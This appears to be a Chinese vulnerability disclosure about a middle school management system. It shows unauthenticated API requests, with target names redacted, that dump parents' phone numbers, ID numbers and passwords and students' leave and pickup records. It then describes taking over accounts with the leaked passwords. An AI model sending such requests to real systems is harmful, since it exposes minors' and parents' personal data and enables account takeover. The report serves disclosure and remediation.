某中学渗透报告

漏洞报告

一、 漏洞概述

描述 内容
标题 xxx中学管理系统存在信息泄露
漏洞报送时间 2026-1-18
漏洞单位 xx中学
漏洞分类 接口未授权
漏洞类型 事件型
漏洞url xxx
漏洞等级 高危
作者 帆船

二、 漏洞说明

存在接口未授权泄露学生家长信息

xxxx/prod-api/parent/auth/list

请求包
GET /prod-api/parent/auth/list?pageNum=1&pageSize=20000 HTTP/1.1
Host: xxxxx

image-20260430003627252

包含大量:手机号,身份证号,和 xx校区,xx通行密码

image-20260430003716083

xxxx系统全用户接管

image-20260430003932041

image-20260430003913725

image-20260118160812437image-20260118160609597
输入/prod-api/parent/auth/list 接口泄露的手机号,密码
xxxxxx/ 123456

image-20260430004055324

image-20260430004119000

image-20260118160916602
成功接管账号

image-20260430004145180

存在接口未授权泄露学生离校信息

/prod-api/parent/leave/list

请求包

GET /prod-api/parent/leave/list?pageNum=1&pageSize=4000 HTTP/1.1
Host: xxxxx
Connection: keep-alive

image-20260430004246930

存在接口未授权泄露学生信息

/prod-api/parent/pickup/list

请求包

GET /prod-api/parent/pickup/list?pageNum=1&pageSize=100  HTTP/1.1
Host: xxxx

image-20260430004332283

三、 修复建议

1、接口鉴权
2、使用强密码

温馨提示:本文内容仅用于合法授权的安全学习与研究交流,严禁用于未授权渗透测试、漏洞利用或任何违法行为。

涉及企业或平台的未公开漏洞信息,请遵循负责任披露原则,勿公开传播可直接复现的敏感细节。

如存在侵权、错误信息或不当内容,请联系站方处理,我们将及时核实并删除。邮箱:admin@baimaojianghu.com。